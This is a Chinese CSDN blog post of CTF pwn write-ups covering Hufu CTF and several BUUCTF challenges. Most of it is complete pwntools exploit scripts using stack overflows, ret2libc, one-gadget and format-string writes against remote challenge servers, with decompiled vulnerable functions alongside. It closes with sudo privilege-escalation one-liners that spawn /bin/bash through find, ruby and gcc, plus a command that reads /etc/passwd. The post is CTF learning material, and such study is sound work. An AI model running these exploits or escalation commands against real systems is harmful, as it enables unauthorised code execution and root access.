几道pwn题复现

最新推荐文章于 2023-09-26 11:38:09 发布
最新推荐文章于 2023-09-26 11:38:09 发布
阅读量453 收藏 1
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44113469/article/details/113744279
版权

不记得是什么时候打的比赛,自己搭的博客崩了,搬来csdn记录一下

虎符CTF 复现

0x01

任意地址写

from pwn import*
from sys import*
p=remote('39.97.210.182',10055)#p=remote()39.97.210.182 10055
#p=process("./chall")
elf=ELF('chall')
#libc = ELF('libc6_2.27-3ubuntu1_amd64.so')
#libc = ELF('./libc-2.23.so')
#libc = ELF('./libc.so.6')
context(os='linux',arch='amd64',log_level='debug')

p.recvuntil("I placed the target near: ")
cmd="cat flag>&0"
add = p.recvuntil("\n")
#
base=string.atoi(add,16) 
base =base -0x0809c0
one = base +0xf1147 # 0x4526a#0x45216#0xf1147#0x10a38c #0x4f2c5#  0x4f2c5 0x4f322 0x10a38c  #0x4f322# #0x4526a
pass_call = base +8341968# 0x7f49d0 #0x7f49d0
print hex(pass_call)
pass_call = eval(str(pass_call))
print "base:"+ hex(base)
print "one:"+hex(one)
print pass_call

p.recvuntil("shoot!\n")
p.sendline(str(pass_call))#+"cat flag >&0")
p.sendlineafter("biang!\n",p64(one)[0])  #0x10a38c 0x4f322
p.sendlineafter("biang!\n",p64(one)[1]) # 
#gdb.attach(p)
p.sendlineafter("biang!\n",p64(one)[2]) #

#p.recvuntil("bye~\n")

#p.sendline(cmd)
p.interactive()

本地通了,远程mmp,偏移不一样还是啥的 。

堆块分配函数

    size = sub_DC7();
    if ( size > 0x100 && (unsigned int)size <= 0xFFF )
    {
      ptr[v2] = malloc(0x28uLL);
      *((_QWORD *)ptr[v2] + 4) = size;
      v0 = ptr[v2];
      v0[3] = malloc(size);                     // ptr[3] --> v0[3] 新开辟的size大小堆块指针在ptr上
      memset(ptr[v2], 0, 0x14uLL);
      read_0x10_to_ptr(ptr[v2]);
      puts("Key: ");
      for ( j = 0; j <= 15; ++j )
        printf("%02x ", *((unsigned __int8 *)ptr[v2] + j));// 打印出 fd 和bk
                                                // 
                                                // 
      printf("\nBox ID: %d\n", v2);
    }

buuctf 刷题缓解心痛心情

pwn1_sctf_2016

C++ 写的,害,输入I, 会转换为you,所以有溢出啊,还有后面函数

from pwn import *
from sys import *

debug=1
context.log_level='debug'
context.arch='amd64'

if debug:
    p=process("./pwn1_sctf_2016")

else:
    host = "node3.buuoj.cn"
    port = 28912
    p=remote(host, port)

door = 0x8048f0d
pay =20*"I"+"aaaa"+p32(door)
gdb.attach(p,"b *0x80491DE")

p.sendline(pay)

p.interactive()

ciscn_2019_n_1 浮点数查看

from pwn import *
from sys import *

debug=0

context.log_level='debug'
context.arch='amd64'


if debug:
    p=process("./ciscn_2019_n_1")

else:
    host = "node3.buuoj.cn"
    port =29648
    p=remote(host, port)


pay = p64(0)*4+p32(0)*3+p64(0x41348000)
#gdb.attach(p,"b *0x80491DE")

p.sendline(pay)

p.interactive()

ciscn_2019_c_1 泄露 打system 需要进行一个栈对齐,不能打onegadget

from pwn import *
from sys import *

debug=0

context.log_level='debug'
context.arch='amd64'


if debug:
    p=process("./ciscn_2019_c_1")

else:
    host = "node3.buuoj.cn"
    port =25934
    p=remote(host, port)

pop_rdi_t=0x400c83
put_got = 0x602020
put_plt = 0x4006E0
main= 0x400B28
pay = "a"*0x58 + p64(pop_rdi_t)+p64(put_got)+p64(put_plt)+p64(main)
#gdb.attach(p)

p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
put_add = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00")) 
base = put_add-0x0809c0
one = base  +  0x4526a#0xf1147#0x45216#,0x4526a#0xf02a4#

print "put:"+hex(put_add)
print "base:"+hex(base)

str_bin = base+0x1b3e9a#0x18cd57
system = base + 0x04f440#0x045390
ret = 0x4006b9  # ubuntu 18  需要进行一个栈调试,因为在调用system的时候需要进行栈对齐
pay = "a"*0x58 +p64(ret)+ p64(pop_rdi_t)+p64(str_bin)+p64(system)

p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)

p.interactive()

babyrop

这个题的关键在于绕过strncmp,strlen函数遇到‘\0’截断,但read 函数遇到‘\n’才截断,然后read函数有一个溢出可以把v5覆盖掉,v5 返回到main函数 ,可以控制另一个函数溢出。

nt __cdecl sub_804871F(int a1)
{
  size_t v1; // eax
  char s; // [esp+Ch] [ebp-4Ch]
  char buf[7]; // [esp+2Ch] [ebp-2Ch]
  unsigned __int8 v5; // [esp+33h] [ebp-25h]
  ssize_t v6; // [esp+4Ch] [ebp-Ch]

  memset(&s, 0, 0x20u);
  memset(buf, 0, 0x20u);
  sprintf(&s, "%ld", a1);
  v6 = read(0, buf, 0x20u);                     // 溢出到v5
  buf[v6 - 1] = 0;
  v1 = strlen(buf);                             // 让strlen(buf) 为0
  if ( strncmp(buf, &s, v1) )                   // 读入到buf
    exit(0);
  write(1, "Correct\n", 8u);
  return v5;

ssize_t __cdecl sub_80487D0(char a1) 这个a1 就是返回的V5了
{
  ssize_t result; // eax
  char buf; // [esp+11h] [ebp-E7h]

  if ( a1 == '' )
    result = read(0, &buf, 0xC8u);
  else
    result = read(0, &buf, a1);                 // 溢出
  return result;
}

比较操蛋的是运程的 lib库,一定要远程去查。

from pwn import *
from sys import *

debug=0

context.log_level='debug'
context.arch='amd64'


if debug:
    p=process("./babyrop")

else:
    host = "node3.buuoj.cn"
    port =27828
    p=remote(host, port)

libc = ELF('./libc6_2.23-0ubuntu10_i386.so') #不是这个库,别瞎搞
#gdb.attach(p)
put_plt = 0x8048548
put_got = 0x8049FD4

main = 0x8048825
pay = "\x00"+"\xff"*8
p.sendline(pay)
p.recvuntil("Correct\n")
pay = 0xe7 *"a"+ "aaaa"+p32(put_plt)+p32(main)+p32(put_got)
p.sendline(pay)

put_add =u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
base =  put_add -0x05f140# libc.symbols["puts"]#0x05fca0
print "put:"+hex(put_add)
print "base:"+hex(base)

pay = "\x00"+"\xff"*8
p.sendline(pay)

str_bin = base +0x15902b# libc.search("/bin/sh").next()#0x15ba0b
system = base + 0x03a940#libc.symbols["system"]#0x03ada0
one = base+0x5fbc6#0x5fbc5#0x3ac69#0x3ac62#0x3ac5e #0x3ac5c#   
pay = 0xe7 *"a"+ "aaaa"+p32(system)+p32(0xbeeefff)+p32(str_bin)
#pay = 0xe7 *"a"+ "aaaa"+p32(one)
p.sendline(pay)
#input()
p.interactive()

网速慢真的是会让人上火 ,tnnnnnnnnnnd,f*********

ciscn_2019_en_2 和ciscn_2019_c_1 一模一样

from pwn import *
from sys import *

debug=0

context.log_level='debug'
context.arch='amd64'


if debug:
    p=process("./ciscn_2019_en_2")

else:
    host = "node3.buuoj.cn"
    port =27611
    p=remote(host, port)

pop_rdi_t=0x400c83
put_got = 0x602020
put_plt = 0x4006E0
main= 0x400B28
pay = "a"*0x58 + p64(pop_rdi_t)+p64(put_got)+p64(put_plt)+p64(main)
#gdb.attach(p)

p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
put_add = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00")) 
base = put_add-0x0809c0
one = base  + 0x10a38c#0x4f322#0x4f2c5# 0x4526a#0xf1147#0x45216#,0x4526a#0xf02a4#

print "put:"+hex(put_add)
print "base:"+hex(base)

str_bin = base+0x1b3e9a#0x18cd57
system = base + 0x04f440#0x045390
ret = 0x4006b9  # ubuntu 18  zhan tiao zheng
pay = "a"*0x58 +p64(ret)+ p64(pop_rdi_t)+p64(str_bin)+p64(system)
#pay = "a"*0x58 +p64(ret)+ p64(one)
p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
p.interactive()

溜了溜了,该玩耍去了

get_started_3dsctf_2016

溢出,后面函数,需要注意的是参数要传对,才能执行后门函数

void __cdecl get_flag(int a1, int a2)
{
  int v2; // eax
  int v3; // esi
  unsigned __int8 v4; // al
  int v5; // ecx
  unsigned __int8 v6; // al

  if ( a1 == 0x308CD64F && a2 == 0x195719D1 )  // 这里的 就是两个参数的值要传对啊,不对就废了
  {
    v2 = fopen("flag.txt", "rt");
    v3 = v2;
    v4 = getc(v2);
    if ( v4 != '\xFF' )
    {
      v5 = (char)v4;
      do
      {
        putchar(v5);
        v6 = getc(v3);
        v5 = (char)v6;
      }
      while ( v6 != 255 );
    }
    fclose(v3);
  }
}

 #!/usr/bin/env python2
# execve generated by ROPgadget
from pwn import *
from sys import *
from struct import pack
debug=0

context.log_level='debug'
context.arch='i386'

if debug:
    o=process("./get")
    gdb.attach(o,"b *0x8048A3B")
else:
    host = "node3.buuoj.cn"
    port =26456
    o=remote(host, port)

ret = 0x8048A40
flag = 0x80489A0
p = 'a'* 56+p32(ret)+p32(flag)+p32(0x804e6a0)+p32(0x308CD64F)+p32(0x195719D1)
o.sendline(p)
o.interactive()

[第五空间2019 决赛]PWN5

绕过if 条件,格式化字符串可写,修改unk_804C044内容即可

  srand(v1);
  fd = open("/dev/urandom", 0);
  read(fd, &unk_804C044, 4u);
  printf("your name:");
  read(0, &buf, 0x63u);
  printf("Hello,");
  printf(&buf);
  printf("your passwd:");
  read(0, &nptr, 0xFu);
  if ( atoi(&nptr) == unk_804C044 )
  {
    puts("ok!!");
    system("/bin/sh");
  }

这道题可以收获的是32位格式化写的时候,payload的构造

p32(add1)+p32(add2)+p32(add3)+"%10$hn%11$hn%12$hn" #hn是双字节写
如果是特定字符写的话,就要巧妙的构造了,比如
p32(add)+"%"+str(xxxxx)+"c%xx$hn"

p32(0x804C044)+p32(0x804C044+2)+"%10$hn" +"%11$hn" #hn是双字节写

 #!/usr/bin/env python2
# execve generated by ROPgadget
from pwn import *
from sys import *
from struct import pack
debug=0

context.log_level='debug'
context.arch='i386'

if debug:
    o=process("./pwn5")
    gdb.attach(o,"b *0x080492A6")
else:
    host = "node3.buuoj.cn"
    port =28330
    o=remote(host, port)

pay =  p32(0x804C044)+p32(0x804C044+2)+"%10$hn" +"%11$hn" #hn是双字节写
o.sendlineafter("your name:",pay)
pa = p32(0x80008)
o.sendlineafter("your passwd:","524296")
o.interactive()

提权

使用gtfo查找提权命令,网址为:https://gtfobins.github.io/

查看系统用户信息:
cat /etc/passwd|grep /bin/bash

sudo -l 查看特权
find命令提权,hackNos-boat是用户名:
sudo -u hackNos-boat /usr/bin/find . -exec /bin/bash \; -quit

ruby 命令提权,hunter 是用户名:
sudo -u hunter /usr/bin/ruby -e 'exec "/bin/bash"'

gcc 提权到root:
sudo /usr/bin/gcc -wrapper /bin/bash,-s .
梦回Altay
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku pwnlibc
11-06
bugku pwnlibc,pwn3做时可在里面查找system、binsh等
buuoj jarvisoj_tell_me_something
pondzhang的专栏
03-26 162
main函数: int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v4; // [rsp+0h] [rbp-88h] write(1, "Input your message:\n", 0x14uLL); read(0, &v4, 0x100uLL); return wri...
我要学pwn.day8
weixin_45963786的博客
07-11 190
[第五空间2019 决赛]PWN5 潜心修炼,从基础开始 据说是基础的格式化字符串漏洞 ps:一个’%10$n’百度了半小时,终于看清楚了,是将成功输入字符串的个数,不是字符串!!! 占位符 作用 %p 以16进制输出指针的值(地址) %x 输出16进制值(与%p有区别) %s 输出字符串值 %d 输出10进制整数 %n 占位符前面成功输入的字符个数写入变量中 解流程 1.查看文件 $ file pwn pwn: ELF 32-bit LSB executable
2021-NCTF pwn方向
Amalllの博客
12-01 3436
周末在学校摸鱼了所以没有参加比赛,赛后看又一次深刻的感觉到自己有多菜了(被新生赛暴打的大二菜狗子 1、easyheap 算是pwn的签到目了,从libc2.32起加了一个异或的保护,不过因为uaf漏洞点外加并没有啥其他的限制所以利用起来没有什么难度 from pwn import * context.log_level = 'debug' r = lambda : p.recv() rx = lambda x: p.recv(x) ru = lambda x: p.recvuntil(..
[HGAME 2023 week1] PWN
Xzzzz911的博客
09-04 968
先ida一下,可以看出来需要进行栈迁移,并且还存在沙盒,还有一段0x30的空间(溢出的空间较大),这就是为什么exp和[NSSCTF Round#14 Basic] rbp 不一样的原因,可溢出的空间不同,导致所利用的条件不同。首先ida一下,可以很明显的了解到跟沙盒有关,再查一下沙盒机制,显然不能直接构造orw,再加上read所存储的字节数少,不能直接构造,所以可以在mmap上面来构造orw。先泄露libc,再把orw写在自己确定的bss段,再用 leave ret 转到bss段,执行orw。
roarctf_2019_easy_pwn
hanabi_sh
12-20 507
buuctf pwn roarctf_2019_easy_pwn off-by-one
[零基础学IoT Pwn] Netgear WNAP320 RCE.doc
07-11
[零基础学IoT Pwn] Netgear WNAP320 RCE.doc
pwn练习附件四道含exp
11-21
个人pwn练习目https://blog.csdn.net/yusakul/article/details/103147299,含exp,推荐去原链接下载:https://bbs.ichunqiu.com/thread-42241-1-1.html
warmup pwn入门
02-11
pwn入门
welpwn pwn 入门
02-11
pwn 入门
pwn-environment:使用docker的ctf-pwn环境
05-11
环境 使用docker的ctf-pwn环境
Antctf-vmpwn
03-15
Antctf-real_vmpwn写 该主通过对vmware dhcp组件进行了神奇的修改,介绍了旧版本中的cve-2020-3947 UAF漏洞和静默固定变量未初始化的漏洞。 此漏洞组合可能导致较低版本(<15.1.2)的实际转义,因此将该漏洞命名为real_vmpwn
2023羊城杯--pwn-heap
最新发布
fuiifiuiii的博客
09-26 248
​ 可以看到,配合new(0x62)或(0x68)以后,delete(这里仅仅是为了达成能够往下修改的效果),然后连续创建两个(0x58),可以覆盖0x60,然后刚好达到第二堆块的index_chunk区域,从而修改指针。另外:这里被free掉的堆块也不会被再次使用,能够正确覆写的原因就是这个堆管理的表(也就是用了第一个堆来存储用到的堆的数据域的地址)可能发用它的过程:从strtok的调用中,si进入发got表跳转的第一个函数是它,然后用libc找到相应的位置,进行更改。
pwnnum25---- strncmp绕过 + 整数溢出 + ret2libc
tbsqigongzi的博客
04-26 998
BUUCTF-PWN-[OGeek2019]babyrop 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 开启canary保护-----栈溢出需绕过canary 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 程序运行后,先让我们输入name,又让我们输入密码, ida一下看一下主函数 首先调用一个sub_80486BB()函数· 一些打初始化的操作 然后打开了一个文
bugku 里面的五个pwnwp
qq_36495104的博客
05-08 2095
pwn1 没给二进制文件,直接nc过去就能拿shell,查看flag,flag{6979d853add353c9} pwn2 查看保护,发什么保护都没开启 ida反编译查看 明显栈溢出,还注意到有后门函数 只需要劫持函数的返回地址到get_shell函数,就可以用拿到flag。使用gdb调试发,在0x38个字符后就会覆盖返回地址,所以编写脚本拿flag。 exp #pwn2.py from pwn import * #sh=process('./pwn2') sh=remote('11
虎符ctf and buuctf 几道
weixin_44113469的博客
02-07 252
虎符ctf securebox 先看一下漏洞函数 size = sub_DC7(); // size 本来是int64的 if ( size > 0x100 && (unsigned int)size <= 0xFFF )// 这里强制转换为32位的了 { qword_202060[v2] = malloc(0x28uLL); *((_QWORD *)qword_202060[
#define NAME 0x3ULL
qq_28349403的博客
12-28 1621
十六进制包括0-f,没有见过U和L,特意上网上查了一下,后缀ULL是指unsigned long long 。
0x14.基础数据结构 — hash表与字符串hash
繁凡さん的博客
05-07 550
hash表与字符串hash详解。 《算法竞赛进阶指南》学习笔记
1.2 C/C++中立即数表示方法
u013845608的博客
01-02 3477
    整型立即数表示方法                     20       // 十进制                      024     // 八进制                      0x14   // 十六进制                                          20u     // 无符整型                     ...
ctf 简单pwn资源
08-09
CTF 简单 PWN 资源是指为了让参与网络攻防竞赛的选手提高他们在 PWN 领域的技能而准备的一些简单目。这些目通常要求选手对二进制代码进行逆向工程、利用漏洞并实施攻击,以获取目提供的关键信息或获取系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值